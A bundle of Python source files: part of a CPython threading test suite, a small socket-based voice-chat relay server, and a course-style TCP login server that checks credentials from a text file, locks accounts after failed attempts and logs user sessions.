t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
gc.collect()
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
gc.collect()
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
@unittest.skip("samisdumb: forking with threads broken (possibly allocator related)")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_done_event(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The _done_event is not set whe
t = threading.Thread(target=f)
self.assertFalse(t._done_event.is_set())
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
self.assertFalse(t._done_event.wait(0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(t._done_event.wait(support.SHORT_TIMEOUT), False)
# Let is_alive() find out the C code is done.
# tstate_lock.release()
self.assertFalse(t.is_alive())
self.assertTrue(t._done_event.is_set())
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_daemon_thread(self):
r, w = self.pipe()
code = textwrap.dedent(f"""
import threading
import sys
channel = open({w}, "w", closefd=False)
def func():
pass
thread = threading.Thread(target=func, daemon=True)
try:
thread.start()
except RuntimeError as exc:
print("ok: %s" % exc, file=channel, flush=True)
else:
thread.join()
print("fail: RuntimeError not raised", file=channel, flush=True)
""")
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
msg = os.read(r, 100).decode().rstrip()
self.assertEqual("ok: daemon thread are not supported "
"in subinterpreters", msg)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
@unittest.skip('dummy Python implementation of RLock is not thread-safe')
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
server.py
|
import signal
import sys
import logging
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from threading import Thread
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler())
class Server:
def __init__(self, host='', port=4000, buffer_size=4096):
self._host = host
self._port = port
self._buffer_size = buffer_size
self._addresses = {}
self._server = socket(family=AF_INET, type=SOCK_STREAM)
self._accept_thread = None
self._voice_server = VoiceServer()
self._voice_server.start()
# must handle any signals to kill gracefully
signal.signal(signal.SIGINT, self._handler)
@property
def server(self):
return self._server
def start(self):
logger.debug('Starting server...')
try:
self._server.bind((self._host, self._port))
self._server.listen(2)
logger.debug('Waiting for connections...')
self._accept_thread = Thread(target=self._handle_connections)
self._accept_thread.start()
except OSError:
logger.error('Server Busy, Something wrong!')
def _handle_connections(self):
while True:
try:
socket_client, address = self._server.accept()
client = Client(
address,
socket_client,
buffer_size=self._buffer_size,
broadcast_callback=self._broadcast_sound,
disconnected_callback=self._client_disconnected
)
logger.debug(f'({client}) is connected..')
client.listen()
# Thread(target=self._client_connection, args=(client,)).start()
self._addresses[address] = client
except ConnectionAbortedError as e:
logger.error(f'ERROR: {e.errno}')
if e.errno == 53: # Software caused connection abort
break
continue
def _client_connection(self, client):
while True:
data = client.recv(self._buffer_size)
if len(data) == 0: # we have a disconnect...
logger.debug(f'Client: {client.getpeername()} disconnected')
self._addresses.pop(client.getpeername(), None)
break
self._broadcast_sound(client, data)
def _client_disconnected(self, client):
logger.debug(f'Client: {client} disconnected')
self._addresses.pop(str(client), None)
def _broadcast_sound(self, client_socket, data_to_be_sent):
for address in self._addresses:
client = self._addresses[address]
if client != client_socket:
client.broadcast(data_to_be_sent)
def _handler(self, signum, frame):
if signum == 2:
self._server.close()
self._accept_thread.join()
# I have no idea why it doesn't kill it correctly.. so annoying.. thread if dead
# print(self._accept_thread.isAlive())
# time.sleep(.5)
sys.exit(0)
def get_clients(self):
return self._addresses
class VoiceServer:
def __init__(self, host='', port=6666, buffer_size=4096):
self._host = host
self._port = port
self._buffer_size = buffer_size
self._server = socket(family=AF_INET, type=SOCK_DGRAM)
self._accept_thread = None
def start(self):
logger.debug('Starting voice server...')
try:
self._server.bind((self._host, self._port))
logger.debug('Waiting for connections...')
self._accept_thread = Thread(target=self._handle)
self._accept_thread.start()
except OSError as e:
logger.error('Server Busy, Something wrong!')
def _handle(self):
while True:
# get the data sent to us
data, ip = self._server.recvfrom(1024)
# display
print("{}: {}".format(ip, data.decode(encoding="utf-8").strip()))
# echo back
self._server.sendto(data, ip)
class Client:
def __init__(self, address, client, buffer_size=4096, broadcast_callback=None, disconnected_callback=None):
self.address = address
self.client = client
self.disconnected = False
self._buffer_size = buffer_size
self._broadcast_callback = broadcast_callback
self._disconnected_callback = disconnected_callback
def __str__(self):
return str(self.address)
def listen(self,):
Thread(target=self._listen).start()
def broadcast(self, data):
self.client.sendall(data)
def _listen(self):
while True:
try:
data = self.client.recv(self._buffer_size)
if len(data) == 0: # we have a disconnect...
self.disconnected = True
self.client.close()
if self._disconnected_callback is not None:
self._disconnected_callback(self)
break
if self._broadcast_callback is not None:
self._broadcast_callback(self, data)
except ConnectionResetError as e:
self.disconnected = True
if self._disconnected_callback is not None:
self._disconnected_callback(self)
if e.errno == 54:
logger.error('ERR: 54 Connection reset by peer')
|
testserver.py
|
# Python 3
# coding: utf-8
import sys
from socket import *
import threading
import time
import datetime as dt
# Read port number and number of failed attempt from sys argv
serverPort = sys.argv[1]
nb_failed = sys.argv[2]
serverPort = int(serverPort)
nb_failed = int(nb_failed)
# The nb of failed attempt should in the range of 1-5
while nb_failed > 5 or nb_failed <= 0:
nb_failed = input("The allowable attempts should be between 1 and 5: ")
# The client log in information is inside this array
# We store it for later authentication use
credentials = {}
with open('Credentials.txt') as f:
for line in f:
line = line.strip()
value = line.split()
credentials[value[0]] = value[1]
# This dict will contain info about blocked account
blocklist = {}
# We also need store the information of message log and user log
logseq = 0
msgseq = 0
msglogall = []
userlog = []
# We need to create the log files in case they do not exists (overwrite every time the server starts)
f = open("userlog.txt", 'w')
f.close()
f = open('messagelog.txt', 'w')
f.close()
# This is the authentication process
def authentication(client_sock, addr):
global nb_failed
global credentials
global blocklist
global logseq
global userlog
attempt = 0
# We ask for the username and check if it is correct
name = False
# I also checked if the username is valid
# However, the test case will not include this situation
while not name:
client_sock.send("Username\r\n".encode('utf-8'))
username = client_sock.recv(2048)
username = username.decode()
if username not in credentials:
attempt += 1
if attempt == nb_failed:
client_sock.send("Locked\r\n".encode('utf-8'))
return 1
client_sock.send("Invalid username\r\n".encode('utf-8'))
else:
name = True
client_sock.send("Password\r\n".encode('utf-8'))
# If the username is correct, we then check if the password is correct
passw = False
while not passw:
password = client_sock.recv(2048)
password = password.decode()
# If this account is in the block list
# We test if the timestamp has passed 10 seconds
if username in blocklist:
if dt.datetime.now() <= blocklist[username]:
client_sock.send("Still locked\r\n".encode('utf-8'))
client_sock.close()
return 1
else:
# If the block time has passed, we remove this account from block list
del blocklist[username]
# Next we check the password
if credentials[username] == password:
client_sock.send("Login Success\r\n".encode('utf-8'))
# The log in is successful and then we need seq number, timestamp, username, host and udp port number
udpport = client_sock.recv(2048)
udpport = udpport.decode('utf-8')
host, port = client_sock.getpeername()
currtime = dt.datetime.now()
date_time = currtime.strftime("%d %b %Y %H:%M:%S")
logseq += 1
# We have all the info, then write them into the log
logEntry = str(logseq) + '; ' + date_time + '; ' + username + '; ' + str(host) + '; ' + udpport + '\n'
f = open('userlog.txt', 'a')
f.write(logEntry)
f.close()
# We also save a copy in a list we defined (for later use)
entry = '; ' + date_time + '; ' + username + '; ' + str(host) + '; ' + udpport + '\n'
userlog.append(entry)
return username
else:
attempt += 1
if attempt >= nb_failed:
client_sock.send("Locked\r\n".encode('utf-8'))
# We add 10 seconds to the timestamp so we can compare it directly with the current time
blocklist[username] = dt.datetime.now() + dt.timedelta(seconds=10)
client_sock.close()
return False
client_sock.send("Invalid Password\r\n".encode('utf-8'))
